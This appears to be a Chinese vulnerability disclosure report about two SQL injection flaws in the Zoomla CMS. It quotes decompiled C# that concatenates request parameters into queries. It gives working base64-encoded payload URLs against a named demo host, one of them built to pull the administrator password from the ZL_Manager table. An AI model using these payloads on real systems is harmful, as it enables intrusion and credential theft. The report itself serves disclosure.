### 简要描述:
无需登录,完美的注射点!
### 详细说明:
```
0x1
App_Web_rckpp0om.dll
User_file 类,Page_Load()事件就有问题
if ((base.Request["state"] != null) && (base.Request["state"] == "tr"))
{
string str4 = base.Request.QueryString["FD"];
this.FileUrl = this.FileJiema(str4);
this.hid.Value = str4;
this.file = this.bfile.SelectFile(string.Concat(new object[] { " FileName='", this.FileUrl, "' and userid=", this.ull.GetLogin().UserID }));//注入点
if (this.file.DownUrl == null)
{
base.Response.Write("0");
base.Response.End();
}
看一下bfile.SelectFile(string)函数,拼接SQL语句
public M_File SelectFile(string where)
{
if (where == "")
{
this.sql = "select * from ZL_File";
}
else
{
this.sql = "select * from ZL_File where " + where;
}
M_File file = new M_File();
SqlDataReader reader = SqlHelper.ExecuteReader(CommandType.Text, this.sql);
if (reader.Read())
{
file.UserID = Convert.ToInt32(reader["UserID"]);
file.State = Convert.ToInt32(reader["State"]);
file.ExtractionCode = reader["ExtractionCode"].ToString();
file.DownUrl = reader["DownUrl"].ToString();
file.FileName = reader["FileName"].ToString();
file.FileMD5 = reader["FileMD5"].ToString();
}
return file;
}
base.Request.QueryString["FD"]可控,最喜欢的注入点,base64的注入语句!
```
搜索一下调用user_file类的文件:url为http://demo.zoomla.cn/common/file.aspx?FD=xxx&state=tr
```
FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
```
理论上这个点还可以任意文件读取。
0x2
```
App_Web_acbkzcqn.dll 中的Edit_Statistics类
protected void Page_Load(object sender, EventArgs e)
{
this.GroupID = this.buser.GetLogin().GroupID;
string groupName = this.bGll.GetByID(this.GroupID).GroupName;
if (base.Request.QueryString["GID"] != null)
{
base.Request.QueryString["GID"].ToString();
M_Node nodeXML = this.bll.GetNodeXML(DataConverter.CLng(DataConverter.CLng(base.Request.QueryString["NodeID"])));
XmlDocument document = new XmlDocument();
try
{
document.Load(base.Server.MapPath("/Config/Payment.xml"));
}
catch (Exception)
{
function.WriteErrMsg("出现错误");
}
XmlNode node2 = document.SelectSingleNode("UserGroups/" + function.GetChineseFirstChar(groupName) + "/Manner");
this.Articles = DataConverter.CLng(node2.Attributes["Articles"].Value);
M_Bnum bnum = this.b_EditWord.SelectBnum(string.Concat(new object[] { " datediff(week,browsertime,getdate())=0 and uid=", this.buser.GetLogin().UserID, " and GID=", base.Request.QueryString["GID"], " order by acid desc" }));//注入点
this.BEcount = this.b_EditWord.BnumCount("");
this.NodeBecount = this.b_EditWord.BnumCount("count(distinct(gid))| and nodeid=" + base.Request.QueryString["NodeID"]);
```
GID注入,前面的NODEID带入正常访问的值即可。
Edit/Statistics.aspx
不测试了,官方修一下吧。
### 漏洞证明:
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
暂无评论